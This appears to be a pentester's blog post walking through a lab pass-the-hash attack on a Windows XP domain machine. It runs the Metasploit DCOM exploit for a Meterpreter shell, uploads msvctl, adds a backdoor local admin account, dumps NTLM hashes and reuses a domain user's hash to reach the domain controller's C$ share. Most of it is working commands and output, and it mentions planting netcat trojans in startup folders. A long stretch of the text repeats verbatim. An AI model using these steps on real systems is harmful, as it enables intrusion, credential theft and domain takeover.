msvctl is very similar to the pass the hash toolkit. i couldnt get the pass the hash to work on my XP SP1 VM joined to the LSOCORP domain and was too lazy to update it just to play.
you can read more on msvctl here:
http://truesecurity.se/blogs/murray/default.aspx
it essentially dumps current hashes from memory, you can then take one of those hashes and "pass it" and run commands as that user. so no more needing to crack hashes, you can pass it and be that person without it.
The scenario we find ourselves in at work, and why i am interested in getting this crap working is that, we pop a box on a domain with a remote exploit but we usually end up as SYSTEM. SYSTEM can do whatever it wants EXCEPT anything on the domain. i can do whatever i want on that box, but i dont have any privileges as far as the DC is concerned and that sux, because the goal is usually to be a domain or enterprise admin. we normally put a netcat type trojan in the startup folder and wait for an admin to log in, waiting sux, and i'm not a patient guy.
the demo in the link above he does with psexec, i'm on linux and things werent quite working out for me and it wasnt working with a meterpreter shell (probably a token issue thats probably why he did it with psexec). anyway, what i did was...
1. got a remote shell via dcom (yeah i know, if a demo, so shut up)
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.29.1:40467 -> 192.168.29.129:4444)
msf exploit(ms03_026_dcom) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.29.1:40467 -> 192.168.29.129:4444
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
2. created a temp directory and then uploaded msvctl.exe & msvctl.dll via meterpeter
meterpreter > upload
Usage: upload [options] src1 src2 src3 ... destination
Uploads local files and directories to the remote machine.
OPTIONS:
-r Upload recursively.
meterpreter > upload msvctl/msvctl_0.3/msvctl.exe msvctl.exe
[*] uploading : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
[*] uploaded : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
meterpreter > upload msvctl/msvctl_0.3/msvctl.dll msvctl.dll
[*] uploading : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
[*] uploaded : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
3. created a local account on the box and added it to the local admin group
meterpreter > execute -f cmd.exe -i -c -H
Process 404 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32\temp>net user localfun localfun /add
net user localfun localfun /add
The command completed successfully.
C:\WINDOWS\system32\temp>net localgroup administrators localfun /add
net localgroup administrators localfun /add
The command completed successfully.
4. logged into the box with my new local account via RDP
5. to test privileges i tried to map to the C drive of the domain controller
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\localfun>net use \\192.168.29.128\c$
The password or user name is invalid for \\192.168.29.128\c$.
Enter the user name for '192.168.29.128': localfun
Enter the password for 192.168.29.128:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
6. CD'ed into the msvctl temp directory and did a list to see what hashes were available. we see that we our credentials and domain user chris has logged on recently.
C:\WINDOWS\system32\temp>msvctl.exe list
luid 0-165157
XPSP1VM\localfun b5176bbcf86d7dc8e72c57ef50f76a05:cad3f54ce9a87c015262d0ae60bcb
d6d
luid 0-148121
LSOCORP\chris 19fe4717a7c8b55daad3b435b51404ee:f2c0c177de720154d024a26e09f0feb3
luid 0-43007
luid 0-997
luid 0-996
LSOCORP\XPSP1VM$ 00000000000000000000000000000000:70b9157dabc8abfe803e3fa4e4af4
d1a
luid 0-31757
LSOCORP\XPSP1VM$ 00000000000000000000000000000000:70b9157dabc8abfe803e3fa4e4af4
d1a
luid 0-999
7. inject a cmd.exe using LSOCORP\Chris hash and get a cmd.exe shell with that his permissions.
C:\WINDOWS\system32\temp>msvctl.exe LSOCORP\chris 19fe4717a7c8b55daad3b435b51404
ee:f2c0c177de720154d024a26e09f0feb3 run cmd
info: running 'cmd '
**at this point i had another cmd.exe shell pop up, i was then able to map a share to the domain controller using that cmd.exe
C:\WINDOWS\system32>net use * \\192.168.29.128\C$
Drive Z: is now connected to \\192.168.29.128\C$.
The command completed successfully.
C:\WINDOWS\system32>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK Z: \\192.168.29.128\C$ Microsoft Windows Network
\\.host VMware Shared Folders
The command completed successfully.
C:\WINDOWS\system32>z:
Z:\>dir
Volume in drive Z has no label.
Volume Serial Number is 9CB6-7878
Directory of Z:\
05/04/2004 12:41 PM 0 AUTOEXEC.BAT
05/04/2004 12:41 PM 0 CONFIG.SYS
09/05/2007 02:44 PM Documents and Settings
08/12/2007 10:55 AM Inetpub
05/04/2004 03:54 AM Program Files
09/16/2007 01:57 PM WINDOWS
05/04/2004 12:42 PM wmpub
2 File(s) 0 bytes
5 Dir(s) 2,025,148,416 bytes free
Z:\>
you can read more on msvctl here:
http://truesecurity.se/blogs/murray/default.aspx
it essentially dumps current hashes from memory, you can then take one of those hashes and "pass it" and run commands as that user. so no more needing to crack hashes, you can pass it and be that person without it.
The scenario we find ourselves in at work, and why i am interested in getting this crap working is that, we pop a box on a domain with a remote exploit but we usually end up as SYSTEM. SYSTEM can do whatever it wants EXCEPT anything on the domain. i can do whatever i want on that box, but i dont have any privileges as far as the DC is concerned and that sux, because the goal is usually to be a domain or enterprise admin. we normally put a netcat type trojan in the startup folder and wait for an admin to log in, waiting sux, and i'm not a patient guy.
the demo in the link above he does with psexec, i'm on linux and things werent quite working out for me and it wasnt working with a meterpreter shell (probably a token issue thats probably why he did it with psexec). anyway, what i did was...
1. got a remote shell via dcom (yeah i know, if a demo, so shut up)
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.29.1:40467 -> 192.168.29.129:4444)
msf exploit(ms03_026_dcom) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.29.1:40467 -> 192.168.29.129:4444
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
2. created a temp directory and then uploaded msvctl.exe & msvctl.dll via meterpeter
meterpreter > upload
Usage: upload [options] src1 src2 src3 ... destination
Uploads local files and directories to the remote machine.
OPTIONS:
-r Upload recursively.
meterpreter > upload msvctl/msvctl_0.3/msvctl.exe msvctl.exe
[*] uploading : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
[*] uploaded : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
meterpreter > upload msvctl/msvctl_0.3/msvctl.dll msvctl.dll
[*] uploading : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
[*] uploaded : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
3. created a local account on the box and added it to the local admin group
meterpreter > execute -f cmd.exe -i -c -H
Process 404 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32\temp>net user localfun localfun /add
net user localfun localfun /add
The command completed successfully.
C:\WINDOWS\system32\temp>net localgroup administrators localfun /add
net localgroup administrators localfun /add
The command completed successfully.
4. logged into the box with my new local account via RDP
5. to test privileges i tried to map to the C drive of the domain controller
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\localfun>net use \\192.168.29.128\c$
The password or user name is invalid for \\192.168.29.128\c$.
Enter the user name for '192.168.29.128': localfun
Enter the password for 192.168.29.128:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
6. CD'ed into the msvctl temp directory and did a list to see what hashes were available. we see that we our credentials and domain user chris has logged on recently.
C:\WINDOWS\system32\temp>msvctl.exe list
luid 0-165157
XPSP1VM\localfun b5176bbcf86d7dc8e72c57ef50f76a05:cad3f54ce9a87c015262d0ae60bcb
d6d
luid 0-148121
LSOCORP\chris 19fe4717a7c8b55daad3b435b51404ee:f2c0c177de720154d024a26e09f0feb3
luid 0-43007
luid 0-997
luid 0-996
LSOCORP\XPSP1VM$ 00000000000000000000000000000000:70b9157dabc8abfe803e3fa4e4af4
d1a
luid 0-31757
LSOCORP\XPSP1VM$ 00000000000000000000000000000000:70b9157dabc8abfe803e3fa4e4af4
d1a
luid 0-999
7. inject a cmd.exe using LSOCORP\Chris hash and get a cmd.exe shell with that his permissions.
C:\WINDOWS\system32\temp>msvctl.exe LSOCORP\chris 19fe4717a7c8b55daad3b435b51404
ee:f2c0c177de720154d024a26e09f0feb3 run cmd
info: running 'cmd '
**at this point i had another cmd.exe shell pop up, i was then able to map a share to the domain controller using that cmd.exe
C:\WINDOWS\system32>net use * \\192.168.29.128\C$
Drive Z: is now connected to \\192.168.29.128\C$.
The command completed successfully.
C:\WINDOWS\system32>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK Z: \\192.168.29.128\C$ Microsoft Windows Network
\\.host VMware Shared Folders
The command completed successfully.
C:\WINDOWS\system32>z:
Z:\>dir
Volume in drive Z has no label.
Volume Serial Number is 9CB6-7878
Directory of Z:\
05/04/2004 12:41 PM 0 AUTOEXEC.BAT
05/04/2004 12:41 PM 0 CONFIG.SYS
09/05/2007 02:44 PM Documents and Settings
08/12/2007 10:55 AM Inetpub
05/04/2004 03:54 AM Program Files
09/16/2007 01:57 PM WINDOWS
05/04/2004 12:42 PM wmpub
2 File(s) 0 bytes
5 Dir(s) 2,025,148,416 bytes free
Z:\>
8. Have peanutbutter jelly time :-)
**Now in this case we dont know that Chris is a local admin, but for the example he is. I also thought that doing a net user /domain or a net group /domain from that shell would return the information but it did not ;-( that's something to look in to.
TODO, get it working with psexec and see if can pull information from the domain with that shell
